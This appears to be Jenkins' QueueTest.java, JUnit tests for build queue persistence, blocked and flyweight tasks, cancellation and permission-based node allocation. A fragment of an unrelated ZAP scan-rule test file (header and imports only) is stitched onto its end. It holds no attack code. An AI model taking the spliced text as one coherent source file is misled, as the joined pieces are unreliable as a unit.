*/ package hudson.model; import com.gargoylesoftware.htmlunit.html.HtmlFileInput; import com.gargoylesoftware.htmlunit.html.HtmlForm; import com.gargoylesoftware.htmlunit.html.HtmlFormUtil; import com.gargoylesoftware.htmlunit.html.HtmlPage; import com.gargoylesoftware.htmlunit.xml.XmlPage; import hudson.Launcher; import hudson.XmlFile; import hudson.matrix.Axis; import hudson.matrix.AxisList; import hudson.matrix.LabelAxis; import hudson.matrix.MatrixBuild; import hudson.matrix.MatrixProject; import hudson.matrix.MatrixRun; import hudson.matrix.TextAxis; import hudson.model.Cause.RemoteCause; import hudson.model.Cause.UserIdCause; import hudson.model.Queue.BlockedItem; import hudson.model.Queue.Executable; import hudson.model.Queue.WaitingItem; import hudson.model.labels.LabelExpression; import hudson.model.queue.AbstractQueueTask; import hudson.model.queue.CauseOfBlockage; import hudson.model.queue.QueueTaskFuture; import hudson.model.queue.ScheduleResult; import hudson.model.queue.SubTask; import hudson.security.ACL; import hudson.security.GlobalMatrixAuthorizationStrategy; import hudson.security.SparseACL; import hudson.slaves.DumbSlave; import hudson.slaves.DummyCloudImpl; import hudson.slaves.NodeProperty; import hudson.slaves.NodePropertyDescriptor; import hudson.slaves.NodeProvisionerRule; import hudson.tasks.BuildTrigger; import hudson.tasks.Shell; import hudson.triggers.SCMTrigger.SCMTriggerCause; import hudson.triggers.TimerTrigger.TimerTriggerCause; import hudson.util.OneShotEvent; import hudson.util.XStream2; import java.io.File; import java.io.IOException; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.List; import java.util.concurrent.CancellationException; import java.util.concurrent.ExecutionException; import java.util.concurrent.Future; import java.util.concurrent.ScheduledThreadPoolExecutor; import java.util.concurrent.TimeUnit; import java.util.concurrent.TimeoutException; import 
java.util.concurrent.atomic.AtomicInteger; import javax.servlet.ServletException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import jenkins.model.Jenkins; import jenkins.security.QueueItemAuthenticatorConfiguration; import jenkins.triggers.ReverseBuildTrigger; import org.acegisecurity.Authentication; import org.acegisecurity.GrantedAuthority; import org.acegisecurity.acls.sid.PrincipalSid; import org.acegisecurity.providers.UsernamePasswordAuthenticationToken; import org.apache.commons.fileupload.FileUploadException; import org.apache.commons.fileupload.disk.DiskFileItemFactory; import org.apache.commons.fileupload.servlet.ServletFileUpload; import org.apache.commons.io.FileUtils; import static org.hamcrest.Matchers.notNullValue; import static org.hamcrest.Matchers.nullValue; import static org.junit.Assert.*; import org.junit.Assert; import org.junit.Rule; import org.junit.Test; import org.jvnet.hudson.test.Issue; import org.jvnet.hudson.test.JenkinsRule; import org.jvnet.hudson.test.MockQueueItemAuthenticator; import org.jvnet.hudson.test.SequenceLock; import org.jvnet.hudson.test.SleepBuilder; import org.jvnet.hudson.test.TestBuilder; import org.jvnet.hudson.test.TestExtension; import org.jvnet.hudson.test.recipes.LocalData; import org.mortbay.jetty.Server; import org.mortbay.jetty.bio.SocketConnector; import org.mortbay.jetty.servlet.ServletHandler; import org.mortbay.jetty.servlet.ServletHolder; /** * @author Kohsuke Kawaguchi */ public class QueueTest { @Rule public JenkinsRule r = new NodeProvisionerRule(-1, 0, 10); /** * Checks the persistence of queue. 
     */
    @Test
    public void persistence() throws Exception {
        Queue q = r.jenkins.getQueue();

        // prevent execution to push stuff into the queue
        r.jenkins.setNumExecutors(0);

        FreeStyleProject testProject = r.createFreeStyleProject("test");
        testProject.scheduleBuild(new UserIdCause());
        q.save();

        // dump the persisted queue.xml for diagnostics
        System.out.println(FileUtils.readFileToString(new File(r.jenkins.getRootDir(), "queue.xml")));

        // exactly the one scheduled item should be in the queue before and after reload
        assertEquals(1, q.getItems().length);
        q.clear();
        assertEquals(0, q.getItems().length);

        // load the contents back
        q.load();
        assertEquals(1, q.getItems().length);

        // did it bind back to the same object?
        assertSame(q.getItems()[0].task, testProject);
    }

    /**
     * Make sure the queue can be reconstructed from a List queue.xml.
     * Prior to the Queue.State class, the Queue items were just persisted as a List.
     */
    @LocalData
    @Test
    public void recover_from_legacy_list() throws Exception {
        Queue q = r.jenkins.getQueue();
        // loaded the legacy queue.xml from test LocalData located in
        // resources/hudson/model/QueueTest/recover_from_legacy_list.zip
        assertEquals(1, q.getItems().length);
        // The current counter should be the id from the item brought back
        // from the persisted queue.xml.
        assertEquals(3, Queue.WaitingItem.getCurrentCounterValue());
    }

    /**
     * Can {@link Queue} successfully recover removal?
     */
    @Test
    public void persistence2() throws Exception {
        Queue q = r.jenkins.getQueue();

        // start from a known-clean counter state so the final assertion is deterministic
        resetQueueState();
        assertEquals(0, Queue.WaitingItem.getCurrentCounterValue());

        // prevent execution to push stuff into the queue
        r.jenkins.setNumExecutors(0);

        FreeStyleProject testProject = r.createFreeStyleProject("test");
        testProject.scheduleBuild(new UserIdCause());
        q.save();

        System.out.println(FileUtils.readFileToString(new File(r.jenkins.getRootDir(), "queue.xml")));

        assertEquals(1, q.getItems().length);
        q.clear();
        assertEquals(0, q.getItems().length);

        // delete the project before loading the queue back; the orphaned item
        // should then be dropped on load
        testProject.delete();
        q.load();
        assertEquals(0, q.getItems().length);

        // The counter state should be maintained.
assertEquals(1, Queue.WaitingItem.getCurrentCounterValue()); } /** * Forces a reset of the private queue COUNTER. * Could make changes to Queue to make that easier, but decided against that. */ private void resetQueueState() throws IOException { File queueFile = r.jenkins.getQueue().getXMLQueueFile(); XmlFile xmlFile = new XmlFile(Queue.XSTREAM, queueFile); xmlFile.write(new Queue.State()); r.jenkins.getQueue().load(); } @Test public void queue_id_to_run_mapping() throws Exception { FreeStyleProject testProject = r.createFreeStyleProject("test"); FreeStyleBuild build = r.assertBuildStatusSuccess(testProject.scheduleBuild2(0)); Assert.assertNotEquals(Run.QUEUE_ID_UNKNOWN, build.getQueueId()); } /** * {@link hudson.model.Queue.BlockedItem} is not static. Make sure its persistence doesn't end up re-persisting the whole Queue instance. */ @Test public void persistenceBlockedItem() throws Exception { Queue q = r.jenkins.getQueue(); final SequenceLock seq = new SequenceLock(); FreeStyleProject p = r.createFreeStyleProject(); p.getBuildersList().add(new TestBuilder() { @Override public boolean perform(AbstractBuild<?, ?> build, Launcher launcher, BuildListener listener) throws InterruptedException, IOException { seq.phase(0); // first, we let one build going seq.phase(2); return true; } }); Future<FreeStyleBuild> b1 = p.scheduleBuild2(0); seq.phase(1); // and make sure we have one build under way // get another going Future<FreeStyleBuild> b2 = p.scheduleBuild2(0); q.scheduleMaintenance().get(); Queue.Item[] items = q.getItems(); assertEquals(1,items.length); assertTrue("Got "+items[0], items[0] instanceof BlockedItem); q.save(); } public static final class FileItemPersistenceTestServlet extends HttpServlet { private static final long serialVersionUID = 1L; @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { resp.setContentType("text/html"); resp.getWriter().println( "<html><body><form action='/' 
method=post name=main enctype='multipart/form-data'>" + "<input type=file name=test><input type=submit>"+ "</form></body></html>" ); } @Override protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { try { ServletFileUpload f = new ServletFileUpload(new DiskFileItemFactory()); List<?> v = f.parseRequest(req); assertEquals(1,v.size()); XStream2 xs = new XStream2(); System.out.println(xs.toXML(v.get(0))); } catch (FileUploadException e) { throw new ServletException(e); } } } @Test public void fileItemPersistence() throws Exception { // TODO: write a synchronous connector? byte[] testData = new byte[1024]; for( int i=0; i<testData.length; i++ ) testData[i] = (byte)i; Server server = new Server(); SocketConnector connector = new SocketConnector(); server.addConnector(connector); ServletHandler handler = new ServletHandler(); handler.addServletWithMapping(new ServletHolder(new FileItemPersistenceTestServlet()),"/"); server.addHandler(handler); server.start(); try { JenkinsRule.WebClient wc = r.createWebClient(); @SuppressWarnings("deprecation") HtmlPage p = (HtmlPage) wc.getPage("http://localhost:" + connector.getLocalPort() + '/'); HtmlForm f = p.getFormByName("main"); HtmlFileInput input = (HtmlFileInput) f.getInputByName("test"); input.setData(testData); HtmlFormUtil.submit(f); } finally { server.stop(); } } @Test public void foldableCauseAction() throws Exception { final OneShotEvent buildStarted = new OneShotEvent(); final OneShotEvent buildShouldComplete = new OneShotEvent(); r.setQuietPeriod(0); FreeStyleProject project = r.createFreeStyleProject(); // Make build sleep a while so it blocks new builds project.getBuildersList().add(new TestBuilder() { public boolean perform(AbstractBuild<?, ?> build, Launcher launcher, BuildListener listener) throws InterruptedException, IOException { buildStarted.signal(); buildShouldComplete.block(); return true; } }); // Start one build to block others 
assertTrue(project.scheduleBuild(new UserIdCause())); buildStarted.block(); // wait for the build to really start // Schedule a new build, and trigger it many ways while it sits in queue Future<FreeStyleBuild> fb = project.scheduleBuild2(0, new UserIdCause()); assertNotNull(fb); assertTrue(project.scheduleBuild(new SCMTriggerCause(""))); assertTrue(project.scheduleBuild(new UserIdCause())); assertTrue(project.scheduleBuild(new TimerTriggerCause())); assertTrue(project.scheduleBuild(new RemoteCause("1.2.3.4", "test"))); assertTrue(project.scheduleBuild(new RemoteCause("4.3.2.1", "test"))); assertTrue(project.scheduleBuild(new SCMTriggerCause(""))); assertTrue(project.scheduleBuild(new RemoteCause("1.2.3.4", "test"))); assertTrue(project.scheduleBuild(new RemoteCause("1.2.3.4", "foo"))); assertTrue(project.scheduleBuild(new SCMTriggerCause(""))); assertTrue(project.scheduleBuild(new TimerTriggerCause())); // Wait for 2nd build to finish buildShouldComplete.signal(); FreeStyleBuild build = fb.get(); // Make sure proper folding happened. 
CauseAction ca = build.getAction(CauseAction.class); assertNotNull(ca); StringBuilder causes = new StringBuilder(); for (Cause c : ca.getCauses()) causes.append(c.getShortDescription() + "\n"); assertEquals("Build causes should have all items, even duplicates", "Started by user SYSTEM\nStarted by an SCM change\n" + "Started by user SYSTEM\nStarted by timer\n" + "Started by remote host 1.2.3.4 with note: test\n" + "Started by remote host 4.3.2.1 with note: test\n" + "Started by an SCM change\n" + "Started by remote host 1.2.3.4 with note: test\n" + "Started by remote host 1.2.3.4 with note: foo\n" + "Started by an SCM change\nStarted by timer\n", causes.toString()); // View for build should group duplicates JenkinsRule.WebClient wc = r.createWebClient(); String nl = System.getProperty("line.separator"); String buildPage = wc.getPage(build, "").asText().replace(nl," "); assertTrue("Build page should combine duplicates and show counts: " + buildPage, buildPage.contains("Started by user SYSTEM (2 times) " + "Started by an SCM change (3 times) " + "Started by timer (2 times) " + "Started by remote host 1.2.3.4 with note: test (2 times) " + "Started by remote host 4.3.2.1 with note: test " + "Started by remote host 1.2.3.4 with note: foo")); } @Issue("JENKINS-8790") @Test public void flyweightTasks() throws Exception { MatrixProject m = r.createMatrixProject(); m.addProperty(new ParametersDefinitionProperty( new StringParameterDefinition("FOO","value") )); m.getBuildersList().add(new Shell("sleep 3")); m.setAxes(new AxisList(new TextAxis("DoesntMatter", "aaa","bbb"))); List<Future<MatrixBuild>> futures = new ArrayList<Future<MatrixBuild>>(); for (int i = 0; i < 3; i++) { futures.add(m.scheduleBuild2(0, new UserIdCause(), new ParametersAction(new StringParameterValue("FOO", "value" + i)))); } for (Future<MatrixBuild> f : futures) { r.assertBuildStatusSuccess(f); } } @Issue("JENKINS-7291") @Test public void flyweightTasksWithoutMasterExecutors() throws Exception { 
DummyCloudImpl cloud = new DummyCloudImpl(r, 0); cloud.label = r.jenkins.getLabel("remote"); r.jenkins.clouds.add(cloud); r.jenkins.setNumExecutors(0); r.jenkins.setNodes(Collections.<Node>emptyList()); MatrixProject m = r.createMatrixProject(); m.setAxes(new AxisList(new LabelAxis("label", Arrays.asList("remote")))); MatrixBuild build; try { build = m.scheduleBuild2(0).get(60, TimeUnit.SECONDS); } catch (TimeoutException x) { throw (AssertionError) new AssertionError(r.jenkins.getQueue().getApproximateItemsQuickly().toString()).initCause(x); } r.assertBuildStatusSuccess(build); assertEquals("", build.getBuiltOnStr()); List<MatrixRun> runs = build.getRuns(); assertEquals(1, runs.size()); assertEquals("slave0", runs.get(0).getBuiltOnStr()); } @Issue("JENKINS-10944") @Test public void flyweightTasksBlockedByShutdown() throws Exception { r.jenkins.doQuietDown(true, 0); AtomicInteger cnt = new AtomicInteger(); TestFlyweightTask task = new TestFlyweightTask(cnt, null); assertTrue(Queue.isBlockedByShutdown(task)); r.jenkins.getQueue().schedule2(task, 0); r.jenkins.getQueue().maintain(); r.jenkins.doCancelQuietDown(); assertFalse(Queue.isBlockedByShutdown(task)); r.waitUntilNoActivity(); assertEquals(1, cnt.get()); assert task.exec instanceof OneOffExecutor : task.exec; } @Issue("JENKINS-24519") @Test public void flyweightTasksBlockedBySlave() throws Exception { Label label = Label.get("myslave"); AtomicInteger cnt = new AtomicInteger(); TestFlyweightTask task = new TestFlyweightTask(cnt, label); r.jenkins.getQueue().schedule2(task, 0); r.jenkins.getQueue().maintain(); r.createSlave(label); r.waitUntilNoActivity(); assertEquals(1, cnt.get()); assert task.exec instanceof OneOffExecutor : task.exec; } @Issue("JENKINS-27256") @Test public void inQueueTaskLookupByAPI() throws Exception { FreeStyleProject p = r.createFreeStyleProject(); Label label = Label.get("unknown-slave"); // Give the project an "unknown-slave" label, forcing it to // stay in the queue after we schedule 
it, allowing us to query it. p.setAssignedLabel(label); p.scheduleBuild2(0); JenkinsRule.WebClient webclient = r.createWebClient(); XmlPage queueItems = webclient.goToXml("queue/api/xml"); String queueTaskId = queueItems.getXmlDocument().getElementsByTagName("id").item(0).getTextContent(); assertNotNull(queueTaskId); XmlPage queueItem = webclient.goToXml("queue/item/" + queueTaskId + "/api/xml"); assertNotNull(queueItem); String tagName = queueItem.getDocumentElement().getTagName(); assertTrue(tagName.equals("blockedItem") || tagName.equals("buildableItem")); } @Issue("JENKINS-28926") @Test public void upstreamDownstreamCycle() throws Exception { FreeStyleProject trigger = r.createFreeStyleProject(); FreeStyleProject chain1 = r.createFreeStyleProject(); FreeStyleProject chain2a = r.createFreeStyleProject(); FreeStyleProject chain2b = r.createFreeStyleProject(); FreeStyleProject chain3 = r.createFreeStyleProject(); trigger.getPublishersList().add(new BuildTrigger(String.format("%s, %s, %s, %s", chain1.getName(), chain2a.getName(), chain2b.getName(), chain3.getName()), true)); trigger.setQuietPeriod(0); chain1.setQuietPeriod(1); chain2a.setQuietPeriod(1); chain2b.setQuietPeriod(1); chain3.setQuietPeriod(1); chain1.getPublishersList().add(new BuildTrigger(String.format("%s, %s", chain2a.getName(), chain2b.getName()), true)); chain2a.getPublishersList().add(new BuildTrigger(chain3.getName(), true)); chain2b.getPublishersList().add(new BuildTrigger(chain3.getName(), true)); chain1.setBlockBuildWhenDownstreamBuilding(true); chain2a.setBlockBuildWhenDownstreamBuilding(true); chain2b.setBlockBuildWhenDownstreamBuilding(true); chain3.setBlockBuildWhenUpstreamBuilding(true); r.jenkins.rebuildDependencyGraph(); r.buildAndAssertSuccess(trigger); // the trigger should build immediately and schedule the cycle r.waitUntilNoActivity(); final Queue queue = r.getInstance().getQueue(); assertThat("The cycle should have been defanged and chain1 executed", queue.getItem(chain1), 
nullValue()); assertThat("The cycle should have been defanged and chain2a executed", queue.getItem(chain2a), nullValue()); assertThat("The cycle should have been defanged and chain2b executed", queue.getItem(chain2b), nullValue()); assertThat("The cycle should have been defanged and chain3 executed", queue.getItem(chain3), nullValue()); } private static class TestFlyweightTask extends TestTask implements Queue.FlyweightTask { Executor exec; private final Label assignedLabel; TestFlyweightTask(AtomicInteger cnt, Label assignedLabel) { super(cnt); this.assignedLabel = assignedLabel; } @Override protected void doRun() { exec = Executor.currentExecutor(); } @Override public Label getAssignedLabel() { return assignedLabel; } } @Test public void taskEquality() throws Exception { AtomicInteger cnt = new AtomicInteger(); ScheduleResult result = r.jenkins.getQueue().schedule2(new TestTask(cnt), 0); assertTrue(result.isCreated()); WaitingItem item = result.getCreateItem(); assertFalse(r.jenkins.getQueue().schedule2(new TestTask(cnt), 0).isCreated()); item.getFuture().get(); r.waitUntilNoActivity(); assertEquals(1, cnt.get()); } private static class TestTask extends AbstractQueueTask { private final AtomicInteger cnt; TestTask(AtomicInteger cnt) { this.cnt = cnt; } @Override public boolean equals(Object o) { return o instanceof TestTask && cnt == ((TestTask) o).cnt; } @Override public int hashCode() { return cnt.hashCode(); } @Override public boolean isBuildBlocked() {return false;} @Override public String getWhyBlocked() {return null;} @Override public String getName() {return "test";} @Override public String getFullDisplayName() {return "Test";} @Override public void checkAbortPermission() {} @Override public boolean hasAbortPermission() {return true;} @Override public String getUrl() {return "test/";} @Override public String getDisplayName() {return "Test";} @Override public Label getAssignedLabel() {return null;} @Override public Node getLastBuiltOn() {return null;} 
@Override public long getEstimatedDuration() {return -1;} @Override public ResourceList getResourceList() {return new ResourceList();} protected void doRun() {} @Override public Executable createExecutable() throws IOException { return new Executable() { @Override public SubTask getParent() {return TestTask.this;} @Override public long getEstimatedDuration() {return -1;} @Override public void run() { doRun(); cnt.incrementAndGet(); } }; } } @Test public void waitForStart() throws Exception { final OneShotEvent ev = new OneShotEvent(); FreeStyleProject p = r.createFreeStyleProject(); p.getBuildersList().add(new TestBuilder() { @Override public boolean perform(AbstractBuild<?, ?> build, Launcher launcher, BuildListener listener) throws InterruptedException, IOException { ev.block(); return true; } }); QueueTaskFuture<FreeStyleBuild> v = p.scheduleBuild2(0); FreeStyleBuild b = v.waitForStart(); assertEquals(1,b.getNumber()); assertTrue(b.isBuilding()); assertSame(p,b.getProject()); ev.signal(); // let the build complete FreeStyleBuild b2 = r.assertBuildStatusSuccess(v); assertSame(b,b2); } /** * Make sure that the running build actually carries an credential. */ @Test public void accessControl() throws Exception { r.configureUserRealm(); FreeStyleProject p = r.createFreeStyleProject(); QueueItemAuthenticatorConfiguration.get().getAuthenticators().add(new MockQueueItemAuthenticator(Collections.singletonMap(p.getFullName(), alice))); p.getBuildersList().add(new TestBuilder() { @Override public boolean perform(AbstractBuild<?, ?> build, Launcher launcher, BuildListener listener) throws InterruptedException, IOException { assertEquals(alice,Jenkins.getAuthentication()); return true; } }); r.assertBuildStatusSuccess(p.scheduleBuild2(0)); } private static Authentication alice = new UsernamePasswordAuthenticationToken("alice","alice",new GrantedAuthority[0]); /** * Make sure that the slave assignment honors the permissions. 
* * We do this test by letting a build run twice to determine its natural home, * and then introduce a security restriction to prohibit that. */ @Test public void permissionSensitiveSlaveAllocations() throws Exception { r.jenkins.setNumExecutors(0); // restrict builds to those slaves DumbSlave s1 = r.createSlave(); DumbSlave s2 = r.createSlave(); r.configureUserRealm(); FreeStyleProject p = r.createFreeStyleProject(); QueueItemAuthenticatorConfiguration.get().getAuthenticators().add(new MockQueueItemAuthenticator(Collections.singletonMap(p.getFullName(), alice))); p.getBuildersList().add(new TestBuilder() { @Override public boolean perform(AbstractBuild<?, ?> build, Launcher launcher, BuildListener listener) throws InterruptedException, IOException { assertEquals(alice,Jenkins.getAuthentication()); return true; } }); final FreeStyleBuild b1 = r.assertBuildStatusSuccess(p.scheduleBuild2(0)); final FreeStyleBuild b2 = r.assertBuildStatusSuccess(p.scheduleBuild2(0)); // scheduling algorithm would prefer running the same job on the same node // kutzi: 'prefer' != 'enforce', therefore disabled this assertion: assertSame(b1.getBuiltOn(),b2.getBuiltOn()); // ACL that allow anyone to do anything except Alice can't build. 
final SparseACL aliceCantBuild = new SparseACL(null); aliceCantBuild.add(new PrincipalSid(alice), Computer.BUILD, false); aliceCantBuild.add(new PrincipalSid("anonymous"), Jenkins.ADMINISTER, true); GlobalMatrixAuthorizationStrategy auth = new GlobalMatrixAuthorizationStrategy() { @Override public ACL getACL(Node node) { if (node==b1.getBuiltOn()) return aliceCantBuild; return super.getACL(node); } }; auth.add(Jenkins.ADMINISTER,"anonymous"); r.jenkins.setAuthorizationStrategy(auth); // now that we prohibit alice to do a build on the same node, the build should run elsewhere for (int i=0; i<3; i++) { FreeStyleBuild b3 = r.assertBuildStatusSuccess(p.scheduleBuild2(0)); assertNotSame(b3.getBuiltOnStr(), b1.getBuiltOnStr()); } } @Test public void pendingsConsistenceAfterErrorDuringMaintain() throws IOException, ExecutionException, InterruptedException{ FreeStyleProject project1 = r.createFreeStyleProject(); FreeStyleProject project2 = r.createFreeStyleProject(); TopLevelItemDescriptor descriptor = new TopLevelItemDescriptor(FreeStyleProject.class){ @Override public FreeStyleProject newInstance(ItemGroup parent, String name) { return (FreeStyleProject) new FreeStyleProject(parent,name){ @Override public Label getAssignedLabel(){ throw new IllegalArgumentException("Test exception"); //cause dead of executor } @Override public void save(){ //do not need save } }; } }; FreeStyleProject projectError = (FreeStyleProject) r.jenkins.createProject(descriptor, "throw-error"); project1.setAssignedLabel(r.jenkins.getSelfLabel()); project2.setAssignedLabel(r.jenkins.getSelfLabel()); project1.getBuildersList().add(new Shell("sleep 2")); project1.scheduleBuild2(0); QueueTaskFuture<FreeStyleBuild> v = project2.scheduleBuild2(0); projectError.scheduleBuild2(0); Executor e = r.jenkins.toComputer().getExecutors().get(0); Thread.sleep(2000); while(project2.getLastBuild()==null){ if(!e.isAlive()){ break; // executor is dead due to exception } if(e.isIdle()){ assertTrue("Node went to idle 
before project had" + project2.getDisplayName() + " been started", v.isDone());
                }
                Thread.sleep(1000);
            }
            // if project2 already built, the executor recovered on its own — nothing left to check
            if (project2.getLastBuild() != null)
                return;
            Queue.getInstance().cancel(projectError); // cancel the job which caused the death of the executor
            e.doYank(); //restart executor
            while (!e.isIdle()) { //executor should take project2 from queue
                Thread.sleep(1000);
            }
            //project2 should not be in pendings
            List<Queue.BuildableItem> items = Queue.getInstance().getPendingItems();
            for (Queue.BuildableItem item : items) {
                assertFalse("Project " + project2.getDisplayName() + " stuck in pendings", item.task.getName().equals(project2.getName()));
            }
        }

        @Test public void cancelInQueue() throws Exception {
            // prepare an offline slave: bring it up online first, then disconnect it
            // so a build assigned to it must sit in the queue
            DumbSlave slave = r.createOnlineSlave();
            assertFalse(slave.toComputer().isOffline());

            slave.toComputer().disconnect(null).get();
            assertTrue(slave.toComputer().isOffline());

            FreeStyleProject p = r.createFreeStyleProject();
            p.setAssignedNode(slave);

            QueueTaskFuture<FreeStyleBuild> f = p.scheduleBuild2(0);
            try {
                f.get(3, TimeUnit.SECONDS);
                fail("Should time out (as the slave is offline).");
            } catch (TimeoutException e) {
                // expected: the build cannot start while its only eligible node is offline
            }

            Queue.Item item = Queue.getInstance().getItem(p);
            assertNotNull(item);
            Queue.getInstance().doCancelItem(item.getId());
            assertNull(Queue.getInstance().getItem(p));

            try {
                f.get(10, TimeUnit.SECONDS);
                fail("Should not get (as it is cancelled).");
            } catch (CancellationException e) {
                // expected: cancelling the queue item cancels its future
            }
        }

        @Test public void waitForStartAndCancelBeforeStart() throws Exception {
            final OneShotEvent ev = new OneShotEvent();
            FreeStyleProject p = r.createFreeStyleProject();

            // quiet period of 10s keeps the item waiting long enough to cancel it below
            QueueTaskFuture<FreeStyleBuild> f = p.scheduleBuild2(10);
            final Queue.Item item = Queue.getInstance().getItem(p);
            assertNotNull(item);

            // cancel the still-waiting item from another thread after 2 seconds
            final ScheduledThreadPoolExecutor executor = new ScheduledThreadPoolExecutor(1);
            executor.schedule(new Runnable() {
                @Override
                public void run() {
                    try {
                        Queue.getInstance().doCancelItem(item.getId());
                    } catch (IOException e) {
                        e.printStackTrace();
                    } catch (ServletException e) {
e.printStackTrace(); } } }, 2, TimeUnit.SECONDS); try { f.waitForStart(); fail("Expected an CancellationException to be thrown"); } catch (CancellationException e) {} } @Issue("JENKINS-27871") @Test public void testBlockBuildWhenUpstreamBuildingLock() throws Exception { final String prefix = "JENKINS-27871"; r.getInstance().setNumExecutors(4); r.getInstance().save(); final FreeStyleProject projectA = r.createFreeStyleProject(prefix+"A"); projectA.getBuildersList().add(new SleepBuilder(5000)); final FreeStyleProject projectB = r.createFreeStyleProject(prefix+"B"); projectB.getBuildersList().add(new SleepBuilder(10000)); projectB.setBlockBuildWhenUpstreamBuilding(true); final FreeStyleProject projectC = r.createFreeStyleProject(prefix+"C"); projectC.getBuildersList().add(new SleepBuilder(10000)); projectC.setBlockBuildWhenUpstreamBuilding(true); projectA.getPublishersList().add(new BuildTrigger(Arrays.asList(projectB), Result.SUCCESS)); projectB.getPublishersList().add(new BuildTrigger(Arrays.asList(projectC), Result.SUCCESS)); final QueueTaskFuture<FreeStyleBuild> taskA = projectA.scheduleBuild2(0, new TimerTriggerCause()); Thread.sleep(1000); final QueueTaskFuture<FreeStyleBuild> taskB = projectB.scheduleBuild2(0, new TimerTriggerCause()); final QueueTaskFuture<FreeStyleBuild> taskC = projectC.scheduleBuild2(0, new TimerTriggerCause()); final FreeStyleBuild buildA = taskA.get(60, TimeUnit.SECONDS); final FreeStyleBuild buildB = taskB.get(60, TimeUnit.SECONDS); final FreeStyleBuild buildC = taskC.get(60, TimeUnit.SECONDS); long buildBEndTime = buildB.getStartTimeInMillis() + buildB.getDuration(); assertTrue("Project B build should be finished before the build of project C starts. 
" + "B finished at " + buildBEndTime + ", C started at " + buildC.getStartTimeInMillis(), buildC.getStartTimeInMillis() >= buildBEndTime); } @Issue("JENKINS-30084") @Test /* * When a flyweight task is restricted to run on a specific node, the node will be provisioned * and the flyweight task will be executed. */ public void shouldRunFlyweightTaskOnProvisionedNodeWhenNodeRestricted() throws Exception { MatrixProject matrixProject = r.createMatrixProject(); matrixProject.setAxes(new AxisList( new Axis("axis", "a", "b") )); Label label = LabelExpression.get("aws-linux-dummy"); DummyCloudImpl dummyCloud = new DummyCloudImpl(r, 0); dummyCloud.label = label; r.jenkins.clouds.add(dummyCloud); matrixProject.setAssignedLabel(label); r.assertBuildStatusSuccess(matrixProject.scheduleBuild2(0)); assertEquals("aws-linux-dummy", matrixProject.getBuilds().getLastBuild().getBuiltOn().getLabelString()); } @Test public void shouldBeAbleToBlockFlyweightTaskAtTheLastMinute() throws Exception { MatrixProject matrixProject = r.createMatrixProject("downstream"); matrixProject.setDisplayName("downstream"); matrixProject.setAxes(new AxisList( new Axis("axis", "a", "b") )); Label label = LabelExpression.get("aws-linux-dummy"); DummyCloudImpl dummyCloud = new DummyCloudImpl(r, 0); dummyCloud.label = label; BlockDownstreamProjectExecution property = new BlockDownstreamProjectExecution(); dummyCloud.getNodeProperties().add(property); r.jenkins.clouds.add(dummyCloud); matrixProject.setAssignedLabel(label); FreeStyleProject upstreamProject = r.createFreeStyleProject("upstream"); upstreamProject.getBuildersList().add(new SleepBuilder(10000)); upstreamProject.setDisplayName("upstream"); //let's assume the flyweighttask has an upstream project and that must be blocked // when the upstream project is running matrixProject.addTrigger(new ReverseBuildTrigger("upstream", Result.SUCCESS)); matrixProject.setBlockBuildWhenUpstreamBuilding(true); //we schedule the project but we pretend no executors are 
available thus //the flyweight task is in the buildable queue without being executed QueueTaskFuture downstream = matrixProject.scheduleBuild2(0); if (downstream == null) { throw new Exception("the flyweight task could not be scheduled, thus the test will be interrupted"); } //let s wait for the Queue instance to be updated while (Queue.getInstance().getBuildableItems().size() != 1) { Thread.sleep(10); } //in this state the build is not blocked, it's just waiting for an available executor assertFalse(Queue.getInstance().getItems()[0].isBlocked()); //we start the upstream project that should block the downstream one QueueTaskFuture upstream = upstreamProject.scheduleBuild2(0); if (upstream == null) { throw new Exception("the upstream task could not be scheduled, thus the test will be interrupted"); } //let s wait for the Upstream to enter the buildable Queue boolean enteredTheQueue = false; while (!enteredTheQueue) { for (Queue.BuildableItem item : Queue.getInstance().getBuildableItems()) { if (item.task.getDisplayName() != null && item.task.getDisplayName().equals(upstreamProject.getDisplayName())) { enteredTheQueue = true; } } } //let's wait for the upstream project to actually start so that we're sure the Queue has been updated //when the upstream starts the downstream has already left the buildable queue and the queue is empty while (!Queue.getInstance().getBuildableItems().isEmpty()) { Thread.sleep(10); } assertTrue(Queue.getInstance().getItems()[0].isBlocked()); assertTrue(Queue.getInstance().getBlockedItems().get(0).task.getDisplayName().equals(matrixProject.displayName)); //once the upstream is completed, the downstream can join the buildable queue again. 
r.assertBuildStatusSuccess(upstream); while (Queue.getInstance().getBuildableItems().isEmpty()) { Thread.sleep(10); } assertFalse(Queue.getInstance().getItems()[0].isBlocked()); assertTrue(Queue.getInstance().getBlockedItems().isEmpty()); assertTrue(Queue.getInstance().getBuildableItems().get(0).task.getDisplayName().equals(matrixProject.displayName)); } //let's make sure that the downstram project is not started before the upstream --> we want to simulate // the case: buildable-->blocked-->buildable public static class BlockDownstreamProjectExecution extends NodeProperty<Slave> { @Override public CauseOfBlockage canTake(Queue.BuildableItem item) { if (item.task.getName().equals("downstream")) { return new CauseOfBlockage() { @Override public String getShortDescription() { return "slave not provisioned"; } }; } return null; } @TestExtension("shouldBeAbleToBlockFlyWeightTaskOnLastMinute") public static class DescriptorImpl extends NodePropertyDescriptor {} } }
/*
 * Zed Attack Proxy (ZAP) and its related class files.
 *
 * ZAP is an HTTP/HTTPS proxy for assessing web application security.
 *
 * Copyright 2019 The ZAP Development Team
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.zaproxy.zap.extension.pscanrulesAlpha;

import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.empty;
import static org.hamcrest.Matchers.equalTo;
import static org.hamcrest.Matchers.hasSize;
import static org.hamcrest.Matchers.is;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.Map;
import org.junit.jupiter.api.Test;
